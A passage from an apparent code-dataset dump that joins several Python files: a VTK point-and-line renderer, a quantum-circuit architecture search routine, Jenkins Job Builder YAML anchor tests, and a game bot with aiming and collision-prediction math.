vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np.array([], dtype=np.int64), deep=True)
self.lines.SetCells(0, vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np.array([]), deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_data)
self.lines_poly.Modified()
def del_lines(self, line_indices):
#todo: change idarray to use tuples of (start,end) locations and set this to delete those partitions
"""
Delete specific lines.
Args:
line_indices (tuple, list, np.ndarray, np.generic):
An array of integers or a single integer representing line memory locations(s) to delete.
"""
np_data = numpy_support.vtk_to_numpy(self.lines.GetData())
np_color_data = numpy_support.vtk_to_numpy(self.line_colors)
if isinstance(line_indices, (tuple, list, np.ndarray, np.generic)):
last_loc = -1
loc = 0
np_new_data = []
np_new_color_data = []
for i in range(len(line_indices)):
loc = self.line_id_array.pop_id(line_indices[i])
if loc==None:
#todo: put warning here
continue
if len(np_new_data) > 0:
np_new_data = np.append(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)
else:
np_new_data = np_data[(last_loc + 1) * 3:loc * 3]
if len(np_new_color_data) > 0:
np_new_color_data = np.append(np_new_color_data, np_color_data[(last_loc + 1):loc], axis=0)
else:
np_new_color_data = np_color_data[(last_loc + 1):loc]
last_loc = loc
last_loc = loc
loc = len(np_data) / 3
np_data = np.append(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)
np_data = np_data.astype(np.int64)
np_color_data = np.append(np_new_color_data, np_color_data[(last_loc + 1):loc], axis=0)
else:
raise TypeError("Deletion list should be tuple, list, np.ndarray, or np.generic")
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_data, deep=True)
self.lines.SetCells(int(len(np_data) / 3), vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_data)
self.lines_poly.Modified()
def del_points(self, point_indices):
"""
Delete specific points.
Args:
point_indices (tuple, list, np.ndarray, np.generic):
An array of integers or a single integer representing point memory locations(s) to delete.
"""
np_point_data = numpy_support.vtk_to_numpy(self.points.GetData())
np_point_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_vert_data = numpy_support.vtk_to_numpy(self.point_vertices.GetData())#1,1,1,2,1,3,1,4,1,5,1,6...
print(len(np_vert_data), len(np_point_data), len(np_point_color_data))
if isinstance(point_indices, (tuple, list, np.ndarray, np.generic)):
last_loc = -1
loc = 0
subtractor = 0
np_new_data = []
np_new_color_data = []
np_new_verts = []
for i in range(len(point_indices)):
loc = self.point_id_array.pop_id(point_indices[i])
if loc == None:
# todo: put warning here
continue
subtractor+=1
#I could just remove the end of the array, but this keeps the lines attached to the same points
if len(np_new_verts) >0:
np_new_verts = np.append(np_new_verts, np_vert_data[(last_loc+1)*2:loc*2], axis = 0)
else:
np_new_verts = np_vert_data[(last_loc+1)*2: loc*2]
if len(np_new_data) > 0:
np_new_data = np.append(np_new_data, np_point_data[(last_loc + 1):loc], axis=0)
else:
np_new_data = np_point_data[(last_loc + 1):loc]
if len(np_new_color_data) > 0:
np_new_color_data = np.append(np_new_color_data, np_point_color_data[(last_loc + 1)*3:loc*3], axis=0)
else:
np_new_color_data = np_point_color_data[(last_loc + 1):loc]
last_loc = loc
if loc == None:
return
last_loc = loc
loc = len(np_point_data)
np_point_data = np.append(np_new_data, np_point_data[(last_loc + 1):loc], axis=0)
np_point_color_data = np.append(np_new_color_data, np_point_color_data[(last_loc + 1):loc], axis=0)
np_vert_data = np.append(np_new_verts, np_vert_data[(last_loc + 1)*2:loc*2], axis = 0)
else:
raise TypeError("Deletion list should be tuple, list, np.ndarray, or np.generic")
vtk_data = numpy_support.numpy_to_vtk(np_point_data, deep=True)
self.points.SetData(vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np_point_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_vert_data, deep=True)
self.point_vertices.SetCells(int(len(np_vert_data) / 2), vtk_data)
self.lines_poly.Modified()
def add_points(self, points, point_colors):
"""
Adds points in 3d space.
Args:
points (tuple, list, np.ndarray, np.generic):
An array in the format of [[x1,y1,z1], [x2,y2,x2], ..., [xn,yn,zn]]
point_colors (tuple, list, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
points to be added.
Returns:
"""
assert (isinstance(points, (list, tuple, np.ndarray, np.generic)))
assert (isinstance(point_colors, (list, tuple, np.ndarray, np.generic)))
np_point_data = numpy_support.vtk_to_numpy(self.points.GetData())
np_point_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_vert_data = numpy_support.vtk_to_numpy(self.point_vertices.GetData())
print(np_vert_data)
for i in range(len(points)):
#todo: modify pointer_id_array to set free pointers to deleted data, not deleted data locations
if len(self.point_id_array.free_pointers)>0:
np_vert_data = np.append(np_vert_data, [1,self.point_id_array.free_pointers.pop()])
else:
np_vert_data = np.append(np_vert_data,[1, len(np_vert_data)/2])
mem_locations = range(int(len(np_point_data)), int((len(np_point_data) + len(points))))
if len(np_point_data) > 0:
np_point_data = np.append(np_point_data, points, axis=0)
else:
np_point_data = points
if len(point_colors) ==1:
points = np.array(points)
point_colors = np.tile(point_colors, (points.shape[0], 1))
if len(np_point_color_data) > 0:
np_point_color_data = np.append(np_point_color_data, point_colors, axis=0)
else:
np_point_color_data = point_colors
vtk_point_data = numpy_support.numpy_to_vtk(num_array=np_point_data, deep=True, array_type=vtk.VTK_FLOAT)
self.points.SetData(vtk_point_data)
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_vert_data.astype(np.int64), deep=True)
self.point_vertices.SetCells(int(len(np_vert_data) / 2), vtk_data)
vtk_point_color_data = numpy_support.numpy_to_vtk(num_array=np_point_color_data,
deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_point_color_data)
self.points_poly.Modified()
self.point_id_array.add_ids(mem_locations)
#print(self.point_id_array)
return mem_locations
def add_point_field(self, widths, normal, center, color):
"""
Adds a rectangular field of points.
Args:
widths (tuple, list, np.ndarray, np.generic): an array defining the widths of each dimension of the field.
normal (tuple, list, np.ndarray, np.generic): an array defining the normal to the field. Specifies angle.
center (tuple, list, np.ndarray, np.generic): an array defining the central position of the field.
color (tuple, list, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
points to be added, or a single color in the form of [[r1, g1, b1]].
Returns:
A list of integers representing the memory locations where the points were added.
"""
true_normal = normalize(normal)
if not np.allclose(true_normal, [1, 0, 0]):
zn = np.cross(true_normal, [1, 0, 0])
xn = np.cross(true_normal, zn)
else:
xn = [1, 0, 0]
zn = [0, 0, 1]
point_field = np.array([])
#todo: replace for loops with numpy or gpu ops
for z in range(-int(m.floor(widths[2] / 2.0)), int(m.ceil(widths[2] / 2.0))):
for y in range(-int(m.floor(widths[1] / 2.0)), int(m.ceil(widths[1] / 2.0))):
for x in range(-int(m.floor(widths[0] / 2.0)), int(m.ceil(widths[0] / 2.0))):
vector_space_matrix = np.column_stack(
(np.transpose(xn), np.transpose(true_normal), np.transpose(zn)))
translation = np.matmul([x, y, z], vector_space_matrix)
point_location = [center[0], center[1], center[2]] + translation
point_location = [point_location]
if len(point_field)>0:
point_field = np.append(point_field, point_location, axis = 0)
else:
point_field = point_location
return self.add_points(point_field, color) #returns ids
def set_bg_color(self, color):
"""
Sets the background color of the viewport.
Args:
color (tuple, list, np.ndarray, np.generic): a single rgb color in the form of [[int, int, int]]
"""
r, g, b = color[0]
r,g,b = (r/255.,g/255.,b/255.)
self.renderer.SetBackground((minmax(r, 0, 1), minmax(g, 0, 1), minmax(b, 0, 1)))
self.renderer.Modified()
def set_all_point_colors(self, color):
"""
Sets the color of every point.
Args:
color (tuple, list, np.ndarray, np.generic): a single rgb color in the form of [[int, int, int]]
"""
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_color_data = np.tile(color, (np_color_data.shape[0], 1))
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
def set_point_colors(self, colors, point_indices=None):
if point_indices is None:
if isinstance(colors, (list, tuple, np.ndarray, np.generic)):
vtk_data = numpy_support.numpy_to_vtk(num_array=colors, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
elif isinstance(point_indices, (list, tuple, np.ndarray, np.generic)):
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_color_data[point_indices] = colors
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
# self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
def setup_lerp_all_point_colors(self, color, fade_time):
"""
Sets all points to the same color, but uses lerping to slowly change the colors.
Args:
color ():
fade_time ():
"""
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
self.next_colors = np.tile(color, (np_color_data.shape[0], 1))
self.prev_colors = numpy_support.vtk_to_numpy(self.point_colors)
self.lerp_fade_time = fade_time
self.remaining_lerp_fade_time = fade_time
def lerp_point_colors(self, colors, fade_time, point_indices=None):
"""
Sets colors for specific points, but uses lerping to slowly change those colors.
Args:
colors ():
fade_time ():
point_indices ():
"""
if isinstance(self.next_colors, (np.ndarray, np.generic)):
if isinstance(point_indices, (list, tuple, np.ndarray, np.generic)):
self.next_colors[point_indices] = colors
else:
self.next_colors = colors
self.next_color_indices = None
elif isinstance(point_indices, (list, tuple, np.ndarray, np.generic)) or isinstance(colors, (list, tuple)):
if self.lerp_fade_time > 0:
self.next_colors = np.append(self.next_colors, colors)
if point_indices is not None:
self.next_color_indices = np.append(self.next_color_indices, point_indices)
else:
self.next_colors = colors
self.next_color_indices = point_indices
# must should not already be lerping
self.prev_colors = numpy_support.vtk_to_numpy(self.point_colors)
# fade time in seconds, float
self.lerp_fade_time = fade_time
self.remaining_lerp_fade_time = fade_time
def set_lerp_remainder(self, lerp_remainder):
"""
Sets the portion of color from the previous color set remains after the lerp has been fully run.
Args:
lerp_remainder ():
"""
self.lerp_multiplier = 1 - lerp_remainder
def _calculate_point_color_lerp(self):
"""
Linearly interpolates colors. In addition to making animation look smoother, it helps prevent seizures a little.
Only a little though, and it has to be used correctly. Still, using it at all helps.
"""
if self.remaining_lerp_fade_time > 0:
# print(self.lerp_fade_time, self.remaining_lerp_fade_time)
lerp_val = self.lerp_multiplier * (
self.lerp_fade_time - self.remaining_lerp_fade_time) / self.lerp_fade_time
# print(lerp_val)
diff_array = (self.prev_colors - self.next_colors)
lerp_diff_array = diff_array * lerp_val
# print(lerp_diff_array)
lerp_colors = self.prev_colors - lerp_diff_array
# print(lerp_colors)
if isinstance(lerp_colors, (np.ndarray, np.generic)):
vtk_data = numpy_support.numpy_to_vtk(num_array=lerp_colors, deep=True,
array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
# self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
self.remaining_lerp_fade_time -= self.loop_change_in_time
# print(self.remaining_lerp_fade_time)
def position_points(self, positions, point_indices=None):
#todo:unit test
"""
Untested with most recent changes.
Sets the positions of specific points, all points, or one point.
Args:
positions ():
point_indices ():
"""
if point_indices == None:
vtk_data = numpy_support.numpy_to_vtk(num_array=positions, deep=True, array_type=vtk.VTK_FLOAT)
self.points.DeepCopy(vtk_data)
elif isinstance(point_indices, (list, tuple)):
if isinstance(positions, (list, tuple)):
for i in range(len(point_indices)):
x, y, z = positions[i % len(positions)]
self.points.SetPoint(point_indices[i], (x, y, z))
else:
for i in range(len(point_indices)):
x, y, z = positions
self.points.SetPoint(point_indices[i], (x, y, z))
else:
x, y, z = positions
self.points.SetPoint(point_indices, (x, y, z))
self.points_poly.Modified()
def add_key_input_functions(self, keydic):
"""
Sets functions to be called when specific keys are pressed, in order from shallowest to deepest dictionaries.
If a key is already in the dictionary, it will be replaced.
Args:
keydic ():
"""
self.interactor_style.append_input_combinations(keydic)
def at_start(self):
"""
Function to be run after class instantiation and vtk start up. Useful for setting things that can only be set
after VTK is running.
"""
pass
def loop(self, obj, event):
"""
Function called every few milliseconds when VTK is set to call. Variables that need updating like change_in_time
can be set here.
Args:
obj ():
event ():
"""
self.loop_change_in_time = time.clock() - self._loop_time
self._loop_time = time.clock()
self._calculate_point_color_lerp()
pass
def at_end(self):
"""
Function called when animation is ended.
"""
self.interactive_renderer.RemoveAllObservers()
def exit(self):
# needed to stop previous setups from being run on next class call
# proper cleanup
self.interactive_renderer.TerminateApp()
def execute(self, obj, event):
"""
Function called to start animation.
Args:
obj ():
event ():
"""
if not self._started:
self.at_start()
self._started = True
self.loop(obj, event)
self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
self.interactive_renderer = obj
self.interactive_renderer.GetRenderWindow().Render()
| 40.629151
| 121
| 0.608374
| 21,780
| 0.989056
| 0
| 0
| 0
| 0
| 0
| 0
| 6,148
| 0.279188
|
c41c57d2fe8c5d4f03096ac847acc8fe35f19ed2
| 3,679
|
py
|
Python
|
work/ArchitectureSearch.py
|
jialiasus2/AI-Studio-Contest-Quantum202103
|
350f20b8805e9696cacacc1339e71bf695571e74
|
[
"Apache-2.0"
] | null | null | null |
work/ArchitectureSearch.py
|
jialiasus2/AI-Studio-Contest-Quantum202103
|
350f20b8805e9696cacacc1339e71bf695571e74
|
[
"Apache-2.0"
] | null | null | null |
work/ArchitectureSearch.py
|
jialiasus2/AI-Studio-Contest-Quantum202103
|
350f20b8805e9696cacacc1339e71bf695571e74
|
[
"Apache-2.0"
] | null | null | null |
import time
import numpy as np
from tqdm import tqdm
from utils import RandomCNOT, RandomCNOTs
def SimulatedAnnealing(quantum_count, layer_count, solver, epochs=100, save_path=None, global_best_score=0):
#TODO:
best_score = 0
cnot = RandomCNOTs(quantum_count, layer_count)
sc, model = solver(cnot)
if sc>best_score:
best_score = sc
cnot_seed = cnot
best_model = model
best_cnot = cnot
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
start_time = time.time()
for epoch in range(epochs):
for i in range(layer_count):
cnot_layers = cnot_seed.copy()
cnot_layers[i] = RandomCNOT(quantum_count)
sc, model = solver(cnot_layers)
if sc>best_score or np.random.randint(epochs)>epoch:
cnot_seed = cnot_layers
if sc>best_score:
best_score = sc
best_model = model
best_cnot = cnot_layers
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
print('epoch %d, iter %d, Score = %g, best_score = %g, global_best_score = %g, time = %gs'%(epoch, i, sc, best_score, global_best_score, time.time()-start_time))
# print(best_model)
return best_score, best_model, best_cnot
def SequenceJitter(quantum_count, layer_count, solver, init_epochs=10, epochs=100, save_path=None, global_best_score=0):
#TODO:
best_score = 0
print('Init cnot seed.')
for _ in tqdm(range(init_epochs)):
cnot = RandomCNOTs(quantum_count, layer_count)
sc, model = solver(cnot)
if sc>best_score:
best_score = sc
cnot_seed = cnot
best_model = model
best_cnot = cnot
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
start_time = time.time()
for epoch in range(epochs):
for i in range(layer_count):
cnot_layers = cnot_seed.copy()
cnot_layers[i] = RandomCNOT(quantum_count)
sc, model = solver(cnot_layers)
if sc>best_score:
best_score = sc
cnot_seed = cnot_layers
best_model = model
best_cnot = cnot_layers
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
print('Score = %g, best_score = %g, global_best_score = %g, time = %gs'%(sc, best_score, global_best_score, time.time()-start_time))
# print(best_model)
return best_score, best_model, best_cnot
def RandomSearch(cnot_creater, solver, epochs=100, save_path=None):
'''
随机搜索
Parameters:
cnot_creater: 生成CNOT层的可执行对象
solver: 一个可执行对象,给定网络结构后,求解网络参数的求解器
epochs: 随机搜索的轮数
save_path: 保存最佳结果的路径
'''
best_score = 0
start_time = time.time()
for epoch in range(epochs):
cnot_layers = cnot_creater()
sc, model = solver(cnot_layers)
if sc>best_score:
best_score = sc
best_model = model
if save_path is not None:
with open(save_path, 'w') as f:
f.write(best_model)
print('No_%d: score = %g, best_score = %g, time = %gs'%(epoch, sc, best_score, time.time()-start_time))
# print(best_model)
return best_score, best_model
| 38.322917
| 173
| 0.59527
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 576
| 0.152019
|
c41c9ed8f0eeeb7bc96538ff09de8ee1da20fa88
| 4,113
|
py
|
Python
|
tests/localyaml/test_localyaml.py
|
sbussetti/jenkins-job-builder
|
fc63f1439816d9022a2d538614b0b7592f96b454
|
[
"Apache-2.0"
] | 1
|
2021-07-30T04:03:53.000Z
|
2021-07-30T04:03:53.000Z
|
tests/localyaml/test_localyaml.py
|
sbussetti/jenkins-job-builder
|
fc63f1439816d9022a2d538614b0b7592f96b454
|
[
"Apache-2.0"
] | 12
|
2020-05-29T05:33:48.000Z
|
2020-09-29T13:02:29.000Z
|
tests/localyaml/test_localyaml.py
|
sbussetti/jenkins-job-builder
|
fc63f1439816d9022a2d538614b0b7592f96b454
|
[
"Apache-2.0"
] | 2
|
2020-05-15T08:29:33.000Z
|
2020-06-04T07:27:31.000Z
|
#!/usr/bin/env python
#
# Copyright 2013 Darragh Bailey
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import yaml
from testtools import ExpectedException
from yaml.composer import ComposerError
from jenkins_jobs.config import JJBConfig
from jenkins_jobs.parser import YamlParser
from tests import base
def _exclude_scenarios(input_filename):
return os.path.basename(input_filename).startswith("custom_")
class TestCaseLocalYamlInclude(base.JsonTestCase):
"""
Verify application specific tags independently of any changes to
modules XML parsing behaviour
"""
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
scenarios = base.get_scenarios(
fixtures_path, "yaml", "json", filter_func=_exclude_scenarios
)
def test_yaml_snippet(self):
if os.path.basename(self.in_filename).startswith("exception_"):
with ExpectedException(ComposerError, "^found duplicate anchor .*"):
super(TestCaseLocalYamlInclude, self).test_yaml_snippet()
else:
super(TestCaseLocalYamlInclude, self).test_yaml_snippet()
class TestCaseLocalYamlAnchorAlias(base.YamlTestCase):
"""
Verify yaml input is expanded to the expected yaml output when using yaml
anchors and aliases.
"""
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
scenarios = base.get_scenarios(fixtures_path, "iyaml", "oyaml")
class TestCaseLocalYamlIncludeAnchors(base.BaseTestCase):
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
def test_multiple_same_anchor_in_multiple_toplevel_yaml(self):
"""
Verify that anchors/aliases only span use of '!include' tag
To ensure that any yaml loaded by the include tag is in the same
space as the top level file, but individual top level yaml definitions
are treated by the yaml loader as independent.
"""
files = [
"custom_same_anchor-001-part1.yaml",
"custom_same_anchor-001-part2.yaml",
]
jjb_config = JJBConfig()
jjb_config.jenkins["url"] = "http://example.com"
jjb_config.jenkins["user"] = "jenkins"
jjb_config.jenkins["password"] = "password"
jjb_config.builder["plugins_info"] = []
jjb_config.validate()
j = YamlParser(jjb_config)
j.load_files([os.path.join(self.fixtures_path, f) for f in files])
class TestCaseLocalYamlRetainAnchors(base.BaseTestCase):
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
def test_retain_anchors_default(self):
"""
Verify that anchors are NOT retained across files by default.
"""
files = ["custom_retain_anchors_include001.yaml", "custom_retain_anchors.yaml"]
jjb_config = JJBConfig()
# use the default value for retain_anchors
jjb_config.validate()
j = YamlParser(jjb_config)
with ExpectedException(yaml.composer.ComposerError, "found undefined alias.*"):
j.load_files([os.path.join(self.fixtures_path, f) for f in files])
def test_retain_anchors_enabled(self):
"""
Verify that anchors are retained across files if retain_anchors is
enabled in the config.
"""
files = ["custom_retain_anchors_include001.yaml", "custom_retain_anchors.yaml"]
jjb_config = JJBConfig()
jjb_config.yamlparser["retain_anchors"] = True
jjb_config.validate()
j = YamlParser(jjb_config)
j.load_files([os.path.join(self.fixtures_path, f) for f in files])
| 33.991736
| 87
| 0.699733
| 3,182
| 0.773645
| 0
| 0
| 0
| 0
| 0
| 0
| 1,784
| 0.433747
|
c41dbd4f1116c76a73c6b7f3a90d3a40a1fa6018
| 24,625
|
py
|
Python
|
seijibot.py
|
seiji56/bot-tac
|
b16b8a8a79d6ac2deb0476ab3a9a0e0b136b1d54
|
[
"MIT"
] | null | null | null |
seijibot.py
|
seiji56/bot-tac
|
b16b8a8a79d6ac2deb0476ab3a9a0e0b136b1d54
|
[
"MIT"
] | null | null | null |
seijibot.py
|
seiji56/bot-tac
|
b16b8a8a79d6ac2deb0476ab3a9a0e0b136b1d54
|
[
"MIT"
] | null | null | null |
from bot_interface import *
import math
class SeijiBot(BotBase):
def __init__(self):
self.initialized = False
def initialize(self, gamestate):
gamestate.log("Initializing...")
#Getting UID
self.uid = gamestate.bot.uid
gamestate.log("This ship has uid " + str(self.uid))
#Getting time step
self.step = gamestate.timestep
gamestate.log("Initialized with timestep of " + str(self.step) + "s")
gamestate.log("Ships have a " + str(gamestate.ships[self.uid].radius) + "m radius")
#Setting Global constants
self.mass = 1
self.main_thrust = 30
self.side_thrust = 15
self.side_thrust_offset = 2
self.laser_charge_time = .5
self.initialized = True
#From here are some useful functions
#Side functions
def solveQuad(self, a, b, c):
if a == 0:
return None
delta = b**2 - 4*a*c
if delta < 0:
return None
if delta == 0:
return (-b)/(2*a), (-b)/(2*a)
delta = math.sqrt(delta)
return (((-b)-delta)/(2*a), ((-b)+delta)/(2*a))
def dist(self, obj1, obj2):
return math.sqrt((obj1.posx - obj2.posx)**2 + (obj1.posy - obj2.posy)**2)
def toRad(self, angle):
return (float(angle)/180)*math.pi
def sign(self, n):
if n == 0:
return 0
return n/abs(n)
def fmod(self, n, k):
d = math.floor(n/k)
return n - k*d
def glob_loc(self, x1, y1, angle, x2, y2):
rx, ry = x2 - x1, y2 - y1
tx, ty = math.cos(-angle) * rx - math.sin(-angle) * ry, math.cos(-angle) * ry + math.sin(-angle) * rx
return tx, ty
def normalize(self, vec):
sqrl = 0
for i in vec:
sqrl += i**2
l = math.sqrt(sqrl)
if l == 0.0:
return vec
res = []
for i in vec:
res.append(i/l)
return res
def invert(self, vec):
return [-i for i in vec]
#Movement functions
#Change angular speed - It doesn't change linear velocity
#Returns -> thruster value
def angularSpeed(self, ship, final_speed):
k = .1
vel = self.toRad(ship.velang)
delta = final_speed - vel
ret = delta*k
if ret > 1:
ret = 1
elif ret < -1:
ret = -1
return -ret
def angDelta(self, ship, angle):
delta = self.fmod(angle + 2*math.pi, 2*math.pi) - self.fmod(self.fmod(self.toRad(ship.ang), 2*math.pi) + 2*math.pi, 2*math.pi)
if abs(delta) > math.pi:
delta = (2*math.pi - abs(delta))*self.sign(-delta)
return delta
#Control ship rotation to certain angle - It doesn't change linear velocity
#Returns -> thruster value
def lookAt(self, ship, final_ang):
kP, kD = .6, 3.5
out = -kP*self.angDelta(ship, final_ang) + kD*self.toRad(ship.velang)*self.step
if out > 1:
out = 1
elif out < -1:
out = -1
return out
#Accelerate ship towards certain coordinate - It doesn't change velang
#Returns -> main thruster value, frontal thruster value, back thruster value
def accelerateTo(self, ship, towx, towy, pot = 1):
tstep = self.step
fmax = self.main_thrust/self.mass
angles = self.toRad(ship.ang)
x, y = self.glob_loc(ship.posx, ship.posy, angles, towx, towy)
res = [0, 0, 0]
cx, cy = self.normalize([x, y])
res[0] = -cy*pot
res[1] = cx*pot
res[2] = cx*pot
return res
#Estimating objects
def estimateObj(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
return objest
def estimateRock(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
return objest
def estimateShip(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
objest.ang += objest.velang*time
return objest
def estimateLaser(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
objest.lifetime -= time
return objest
#Estimating Time of Collision
#Returns -> Time(seconds) for collision of obj1 and obj2: MIN, MAX
def toC(self, obj1, obj2, error_margin):
A = obj1.posx
a = obj1.velx
B = obj2.posx
b = obj2.velx
C = obj1.posy
c = obj1.vely
D = obj2.posy
d = obj2.vely
R = obj1.radius + error_margin/2
r = obj2.radius + error_margin/2
Asq = A**2
asq = a**2
Bsq = B**2
bsq = b**2
Csq = C**2
csq = c**2
Dsq = D**2
dsq = d**2
Rsq = R**2
rsq = r**2
div = asq - 2*a*b + bsq + csq - 2*c*d + dsq
delta = (-Asq*csq + 2*Asq*c*d - Asq*dsq + 2*A*B*csq - 4*A*B*c*d + 2*A*B*dsq + 2*A*C*a*c - 2*A*C*a*d - 2*A*C*b*c + 2*A*C*b*d - 2*A*D*a*c + 2*A*D*a*d + 2*A*D*b*c - 2*A*D*b*d - Bsq*csq + 2*Bsq*c*d - Bsq*dsq - 2*B*C*a*c + 2*B*C*a*d + 2*B*C*b*c - 2*B*C*b*d + 2*B*D*a*c - 2*B*D*a*d - 2*B*D*b*c + 2*B*D*b*d - Csq*asq + 2*Csq*a*b - Csq*bsq + 2*C*D*asq - 4*C*D*a*b + 2*C*D*bsq - Dsq*asq + 2*Dsq*a*b - Dsq*bsq + Rsq*asq - 2*Rsq*a*b + Rsq*bsq + Rsq*csq - 2*Rsq*c*d + Rsq*dsq + 2*R*asq*r - 4*R*a*b*r + 2*R*bsq*r + 2*R*csq*r - 4*R*c*d*r + 2*R*dsq*r + asq*rsq - 2*a*b*rsq + bsq*rsq + csq*rsq - 2*c*d*rsq + dsq*rsq)
minusb = (-A*a + A*b + B*a - B*b - C*c + C*d + D*c - D*d)
if div == 0 or delta < 0:
return None
else:
res0 = (minusb - math.sqrt(delta))/(div)
res1 = (minusb + math.sqrt(delta))/(div)
return res0, res1
#Predictive shooting of moving target
#Returns -> Time(seconds) for shoot to reach target on line, coordinates x and y for the shoot to be 'centered'
def predShoot(self, ship, target, speed, gamestate):
tx = target.posx - ship.posx
ty = target.posy - ship.posy
tvx = target.velx - ship.velx
tvy = target.vely - ship.vely
a = tvx**2 + tvy**2 - speed**2
b = 2*(tvx*tx + tvy * ty)
c = tx**2 + ty**2
r = self.solveQuad(a, b, c)
if r == None:
return None
else:
r0, r1 = r
if r1 < 0 and r0 < 0:
return None
elif r0 < 0:
coords = (target.posx + tvx*r1, target.posy + tvy*r1)
return r1, coords
else:
coords = (target.posx + tvx*r0, target.posy + tvy*r0)
return r0, coords
target = None
ok = False
ltick = 0
def process(self, gamestate):
if not self.initialized:
self.initialize(gamestate)
return Action(0, .1, .1, 0)
try:
sgargs = gamestate.ships[self.target]
except:
self.target = None
self.ok = False
if len(gamestate.ships) > 1 and not self.ok:
for i in gamestate.ships:
if i is not self.uid:
self.ok = True
self.target = i
gamestate.log("Following ship " + str(i))
break
s_ship = gamestate.ships[self.uid]
zero = 0
out = [0, 0, 0]
avoid = [0, 0, 0]
rotation_out = 0
rot_mean = 0
out_s = 0
self.ltick = gamestate.tick
#Targeting and shooting
for ship_uid in gamestate.ships:
if self.uid == ship_uid:
continue
ship = gamestate.ships[ship_uid]
if self.dist(ship, s_ship) < self.dist(gamestate.ships[self.target], s_ship):
self.target = ship_uid
if(self.target is not None):
targetp = self.estimateShip(gamestate.ships[self.target], self.step)
shipp = self.estimateShip(s_ship, self.step)
prediction0 = None
prediction1 = None
prediction2 = None
shoot_type = 0
min_time = 9999
if shipp.charge >= 3:
predictiont = self.predShoot(shipp, targetp, 75, gamestate)
if predictiont is not None:
time, coords = predictiont
time += self.step
if time < .8:
prediction2 = predictiont
if shipp.charge >= 2:
predictiont = self.predShoot(shipp, targetp, 50, gamestate)
if predictiont is not None:
time, coords = predictiont
time += self.step
if time < .6:
prediction1 = predictiont
if shipp.charge >= 1:
predictiont = self.predShoot(shipp, targetp, 25, gamestate)
if predictiont is not None:
time, coords = predictiont
time += self.step
if time < .4:
prediction0 = predictiont
time, coords = None, None
if prediction2 is not None:
time, coords = prediction2
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 3
if prediction1 is not None:
time, coords = prediction1
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 2
if prediction0 is not None:
time, coords = prediction0
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 1
if time is not None:
rotation_out += self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
rot_mean += 1
else:
rotation_out += self.lookAt(shipp, math.atan2(shipp.posx - targetp.posx,targetp.posy - shipp.posy ))
#Avoidance code
#Avoid rocks
rock_repel_r = 15
rock_repel_t = 5
rock_less = 9999
rock_less_uid = None
for rock_uid in gamestate.rocks:
rock = gamestate.rocks[rock_uid]
dist = self.dist(s_ship, rock)
final = [0, 0, 0]
if dist <= rock_repel_r:
